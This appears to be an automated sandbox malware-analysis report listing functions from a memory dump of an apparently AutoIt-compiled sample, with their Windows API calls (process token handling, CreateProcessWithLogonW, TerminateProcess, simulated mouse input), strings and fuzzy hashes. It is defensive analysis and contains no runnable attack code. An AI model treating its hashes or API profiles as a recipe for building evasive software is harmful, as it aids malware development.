Opcode Fuzzy Hash: 182190091855448c9f3fa8371ee539d8765af20d997b773ba7d5f069866893e2
Instruction Fuzzy Hash: D541CF30611301EFD721DF24DC88FBA7BE8EB49325F044669F9A5872A1C7309C69DB65

Function 002DB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(003157B0,00000000,013E59A8,?,?,003157B0,?,002DB5A8,?,?), ref: 002DB712
EnableWindow.USER32(00000000,00000000), ref: 002DB736
ShowWindow.USER32(003157B0,00000000,013E59A8,?,?,003157B0,?,002DB5A8,?,?), ref: 002DB796
ShowWindow.USER32(00000000,00000004,?,002DB5A8,?,?), ref: 002DB7A8
EnableWindow.USER32(00000000,00000001), ref: 002DB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 002DB7EF

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 8d19ec214c2f86cb1ea7771e899cc73b63d40e0bc253ed2d65c69af6e6f556ea
Instruction ID: c960cc68a1ddb6aa0b5347fa4f33061c051d22d19ca89cd53fe2977bb9cd8c34
Opcode Fuzzy Hash: 8d19ec214c2f86cb1ea7771e899cc73b63d40e0bc253ed2d65c69af6e6f556ea
Instruction Fuzzy Hash: C4419135601241EFEB22CF24C5A9B94BBE0FF45310F1941BAE9598F7A2C731AC66CB50

Function 002C709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,002C4E41,?,?,00000000,00000001), ref: 002C70AC

Part of subcall function 002C39A0: GetWindowRect.USER32(?,?), ref: 002C39B3

GetDesktopWindow.USER32 ref: 002C70D6
GetWindowRect.USER32(00000000), ref: 002C70DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002C710F

Part of subcall function 002B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC

GetCursorPos.USER32(?), ref: 002C713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002C7199

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: c2e5ab67ec11b5362e5ad87c07e7392d809fd39722aae57d0782c7419e7f3f3b
Instruction ID: 171b5e2d6b1542c28f207115784257fdb265bb3225ebb143289242533de0fc5a
Opcode Fuzzy Hash: c2e5ab67ec11b5362e5ad87c07e7392d809fd39722aae57d0782c7419e7f3f3b
Instruction Fuzzy Hash: 1B31E172509306ABD720DF14D849F9BB7E9FB88314F040A1AF98997191C670EA18CF96

Function 002A8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A80C0
Part of subcall function 002A80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A80CA
Part of subcall function 002A80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A80D9
Part of subcall function 002A80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A80E0
Part of subcall function 002A80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A80F6

GetLengthSid.ADVAPI32(?,00000000,002A842F), ref: 002A88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A88D6
HeapAlloc.KERNEL32(00000000), ref: 002A88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 002A88F6
GetProcessHeap.KERNEL32(00000000,00000000,002A842F), ref: 002A890A
HeapFree.KERNEL32(00000000), ref: 002A8911

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 083b114b9cb70c789b518ab7e616721966c1031f233da16946e5c06dc0a85d00
Instruction ID: d853bbdcf565f8f558400078712e14031a1e056b535e26557866a23de2d5fe56
Opcode Fuzzy Hash: 083b114b9cb70c789b518ab7e616721966c1031f233da16946e5c06dc0a85d00
Instruction Fuzzy Hash: 7011AF7192220AFFDB509FA4DD09BBF7778EB46311F148029E84697210CF369E24DB60

Function 002A85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002A85E2
OpenProcessToken.ADVAPI32(00000000), ref: 002A85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002A85F8
CloseHandle.KERNEL32(00000004), ref: 002A8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002A8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 002A8646

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 480d3f20842d93a19eb900bbe48e8ebc86c02ef720ad4b8d889015d922733727
Instruction ID: 588d4b51d456f393920e2604bebaa7e1daa92af254920b7786420840f90b4441
Opcode Fuzzy Hash: 480d3f20842d93a19eb900bbe48e8ebc86c02ef720ad4b8d889015d922733727
Instruction Fuzzy Hash: BD117F7290124EABEF01CFA4ED49FDE7BA9EF09704F044065FE05A2160CB718D60DB60

Function 002AB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002AB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 002AB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002AB7CD
ReleaseDC.USER32(00000000,00000000), ref: 002AB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 002AB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 002AB7FE

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 313a56193e369a12ee1974f735f582816c84192ac97c30494177dffcb8e69159
Instruction ID: 7d2e9d9cc27edd84c377be9ca37133405d9d55cd28c3a8fe109091b58640023c
Opcode Fuzzy Hash: 313a56193e369a12ee1974f735f582816c84192ac97c30494177dffcb8e69159
Instruction Fuzzy Hash: 8901A775E01309BBEF109FB69D49A5EBFB8EB49311F008076FA08A7291DA709D10CF94

Function 00270162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00270193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0027019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 002701A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 002701B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 002701B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 002701C1

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6b4f097703683ffe54cbce7cee516c31c78cee4b11d62b66a3019bb501dbc2d6
Instruction ID: 5ad20d3ca3b6f2223a3b3cb509e65e079b15f9a2dbdd5fe6d463a9155618187d
Opcode Fuzzy Hash: 6b4f097703683ffe54cbce7cee516c31c78cee4b11d62b66a3019bb501dbc2d6
Instruction Fuzzy Hash: 8B0148B09027597DE3008F5A8C85A52FFA8FF19354F00411BA15847941C7B5A864CBE5

Function 002B53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002B53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002B540F
GetWindowThreadProcessId.USER32(?,?), ref: 002B541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B543E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: caae28fcb469c5966c1376310fc3995ef8162698c8232ee2801e1b2f1c142648
Instruction ID: e1f4c652e98eb7a841d0453456f0078369a5de544fd4c2cffe731c863ddbb967
Opcode Fuzzy Hash: caae28fcb469c5966c1376310fc3995ef8162698c8232ee2801e1b2f1c142648
Instruction Fuzzy Hash: 33F06231542158BBD3605B52AD0DEEB7B7CEBC6B11F04016AF915D105096A05E0186B9

Function 002B7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 002B7243
EnterCriticalSection.KERNEL32(?,?,00260EE4,?,?), ref: 002B7254
TerminateThread.KERNEL32(00000000,000001F6,?,00260EE4,?,?), ref: 002B7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00260EE4,?,?), ref: 002B726E

Part of subcall function 002B6C35: CloseHandle.KERNEL32(00000000,?,002B727B,?,00260EE4,?,?), ref: 002B6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 002B7281
LeaveCriticalSection.KERNEL32(?,?,00260EE4,?,?), ref: 002B7288

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: fc76a081231791a7e6621c7979c91d4c43c26832b68be11c1f8ab8a9562f58c3
Instruction ID: 6e47a3fd5615cebc83bb41971c094164e79bad8a846988d5e4ce3f65ee6e749f
Opcode Fuzzy Hash: fc76a081231791a7e6621c7979c91d4c43c26832b68be11c1f8ab8a9562f58c3
Instruction Fuzzy Hash: 8FF05E36942612EBD7912F64FE4CADA7729EF45702B100533F943910A0CB765D11CB54

Function 002A8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 002A899D
UnloadUserProfile.USERENV(?,?), ref: 002A89A9
CloseHandle.KERNEL32(?), ref: 002A89B2
CloseHandle.KERNEL32(?), ref: 002A89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 002A89C3
HeapFree.KERNEL32(00000000), ref: 002A89CA

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: d835e135be6aad7ff31c84b58415485df6a29cd5dad537c2360b155505ee9006
Instruction ID: 2c5f7004c80368be5aaae94cdaa003d7457b9ff3ad298adda50b190ed230e6b5
Opcode Fuzzy Hash: d835e135be6aad7ff31c84b58415485df6a29cd5dad537c2360b155505ee9006
Instruction Fuzzy Hash: 64E0C236505001FBDA812FE5FE0C94ABB69FB89322B108232F21A81170CB329820DB58

Function 002A7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A7702
CLSIDFromProgID.OLE32(?,?,00000000,002DFB80,000000FF,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A7727
_memcmp.LIBCMT ref: 002A7748

Strings

,,., xrefs: 002A753D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,.
API String ID: 314563124-737214711
Opcode ID: 1c1aeb8c79722f156869056637c753e28cd8e7ec8b3f271ccd3b61b227e47b67
Instruction ID: bf32499fd572683b9312d79e7941adde28a354a86976aed4996bddd6ed65c87e
Opcode Fuzzy Hash: 1c1aeb8c79722f156869056637c753e28cd8e7ec8b3f271ccd3b61b227e47b67
Instruction Fuzzy Hash: 82812E71A1010AEFCB04DFA4CD84EEEB7B9FF89315F204599E506AB250DB71AE05CB64

Function 002C85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002C8613
CharUpperBuffW.USER32(?,?), ref: 002C8722
VariantClear.OLEAUT32(?), ref: 002C889A

Part of subcall function 002B7562: VariantInit.OLEAUT32(00000000), ref: 002B75A2
Part of subcall function 002B7562: VariantCopy.OLEAUT32(00000000,?), ref: 002B75AB
Part of subcall function 002B7562: VariantClear.OLEAUT32(00000000), ref: 002B75B7

Strings

Incorrect Parameter format, xrefs: 002C864B, 002C880D
AUTOIT.ERROR, xrefs: 002C8728

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 4f70db6ac81fb0a452f50c9879a9a1c22d35b84b9baa057035f16ae13b389aca
Instruction ID: 53ca1c5788a5f3dac1f04a50b6505b92bc13760cc118af904ed5d41608205969
Opcode Fuzzy Hash: 4f70db6ac81fb0a452f50c9879a9a1c22d35b84b9baa057035f16ae13b389aca
Instruction Fuzzy Hash: C49159746243059FC710DF24C484E6AB7E4EF89714F148A6EF88A8B361DB31E959CF92

Function 002B2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9

_memset.LIBCMT ref: 002B2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002B2C97

Strings

0, xrefs: 002B2B73

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 0bcc1def008408c06e973109ff47a560e04155de2c5531748b11e7bd5152ac97
Instruction ID: d4e41b3ae737b38016514d22a110ee0fc8784a480ea7d789e8adb8644f03b8be
Opcode Fuzzy Hash: 0bcc1def008408c06e973109ff47a560e04155de2c5531748b11e7bd5152ac97
Instruction Fuzzy Hash: 5951C271528302DBD7259F24D8456AF7BE8EF89390F04492EF895D3191DB70CD688B92

Function 00263137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00263277
_memmove.LIBCMT ref: 00263310
_free.LIBCMT ref: 00263336
_memmove.LIBCMT ref: 002633E9

Strings

3c&, xrefs: 00263225
_&, xrefs: 00263322

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove$_free
String ID: 3c&$_&
API String ID: 2620147621-1388094336
Opcode ID: d73359b903e853810b9f2f993ab47ef8fc77a5a622291e51555994300c0972cf
Instruction ID: c74e9dcd5b1bf20f5aeb5170492256f9ec8dc6cea1ff9affe15e2aac02b51b84
Opcode Fuzzy Hash: d73359b903e853810b9f2f993ab47ef8fc77a5a622291e51555994300c0972cf
Instruction Fuzzy Hash: 92515B716243428FDB25CF28C880B6ABBE5FF85314F04882DE98997351DB31E965CF82

Function 00266192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00266248
_memmove.LIBCMT ref: 002662E4
_memset.LIBCMT ref: 00266308

Strings

ERCP, xrefs: 002661B3
3c&, xrefs: 002662AF

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3c&$ERCP
API String ID: 2532777613-1111993731
Opcode ID: 9cea33ef7d5ce2d328aacf033f55d7ab9d3ed3c7d5d3ed49ccb8b85d5bb9be88
Instruction ID: 0a722adfc43d5916fa079c6a271281cc46863b62b7c10837a7a1b074c9c47fef
Opcode Fuzzy Hash: 9cea33ef7d5ce2d328aacf033f55d7ab9d3ed3c7d5d3ed49ccb8b85d5bb9be88
Instruction Fuzzy Hash: 9951C371920706DFDB24CF65C895BAAB7F4EF44704F20856EE94AC7291E770EAA4CB40

Function 002B2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002B27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 002B2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00315890,00000000), ref: 002B286B

Strings

0, xrefs: 002B27B5

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0b7540681e32c89e1ddb60029de120dc1b975394365f38502369b4fb4c59c3d8
Instruction ID: e1e2f5b13f2d5680518e152f9f199c15b84f23dc24837ac0bc0770bdaf3dd093
Opcode Fuzzy Hash: 0b7540681e32c89e1ddb60029de120dc1b975394365f38502369b4fb4c59c3d8
Instruction Fuzzy Hash: 2B41B270614302DFD720DF24DC48B9ABBE8EF85354F044A6DF96697292D730E919CB62

Function 002CD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CD7C5

Part of subcall function 0025784B: _memmove.LIBCMT ref: 00257899

Strings

winapi, xrefs: 002CD836
cdecl, xrefs: 002CD81C
stdcall, xrefs: 002CD847
none, xrefs: 002CD8A0

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: ecbd155639b0ae101ceb07732ba90417d134a7f997677f3f9028cbc9cbce2e57
Instruction ID: baf81812e3c7ebd64ac43971174333e5a961fe4b984164b2eb6df75700ebb2d3
Opcode Fuzzy Hash: ecbd155639b0ae101ceb07732ba90417d134a7f997677f3f9028cbc9cbce2e57
Instruction Fuzzy Hash: 34319275924215ABCF00EF54CC51EAEB3B5FF04720B108769E869976D1DB71A91ACF80

Function 002A8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

